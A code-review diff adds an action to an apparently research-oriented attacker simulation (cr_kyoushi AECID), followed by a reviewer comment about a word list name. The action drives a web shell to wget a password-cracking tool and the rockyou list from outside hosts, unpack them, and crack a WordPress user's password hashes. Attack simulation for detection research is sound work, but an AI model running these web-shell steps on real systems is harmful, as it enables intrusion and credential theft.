src/cr_kyoushi/statemachines/aecid_attacker/actions.py

```diff
@@ -510,6 +511,124 @@ def __call__(
+            cmd_param: the GET parameter to embed the command in.
+            verify: if HTTPS connection should very TLS certs.
+            timeout: the maximum time to wait for the web server to respond.
+            sleep_time: the waiting time between executed requests.
+        """
+        self.url = hashcrack_url
+        self.file_name = file_name
+        self.wl_host = wl_host
+        self.attacked_user = attacked_user
+        self.tar_download_name = tar_download_name
+        self.cmd_param = cmd_param
+        self.verify = verify
+        self.timeout = timeout
+        self.sleep_time = sleep_time
+
+    def __call__(
+        self,
+        log: BoundLogger,
+        current_state: str,
+        context: Context,
+        target: Optional[str],
+    ):
+        web_shell = context.web_shell
+        log = log.bind(
+            url=self.url,
+            wl_host=self.wl_host,
+            attacked_user=self.attacked_user,
+            web_shell=web_shell,
+        )
+        if web_shell is not None:
+            log.info("Downloading WPHashCrack")
+            archive_download_cmd = ["wget", self.url + self.file_name]
+            if self.tar_download_name is not None:
+                archive_download_cmd += ["-O", self.tar_download_name]
+            output = send_request(
+                log,
+                web_shell,
+                archive_download_cmd,
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Downloaded WPHashCrack")
+            log.info("Unarchiving WPHashCrack")
+            if self.tar_download_name is None:
+                self.tar_download_name = self.file_name
+            output = send_request(
+                log,
+                web_shell,
+                ["tar", "xvfz", self.tar_download_name],
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Unarchived WPHashCrack")
+            log.info("Downloading password list")
+            output = send_request(
+                log,
+                web_shell,
+                ["wget", self.wl_host],
+                self.cmd_param,
+                self.verify,
+                self.timeout,
+            )
+            sleep(self.sleep_time)
+            log.info("Web shell command response", output=output)
+            log.info("Downloaded password list")
+            log.info("Running WPHashCrack")
+            output = send_request(
+                log,
+                web_shell,
+                [
+                    "./wphashcrack-0.1/wphashcrack.sh",
+                    "-w",
+                    "$PWD/rockyou.txt",
```

Comment:
You will need to set the word list name from a var similar to the tar file now that you can configure the URL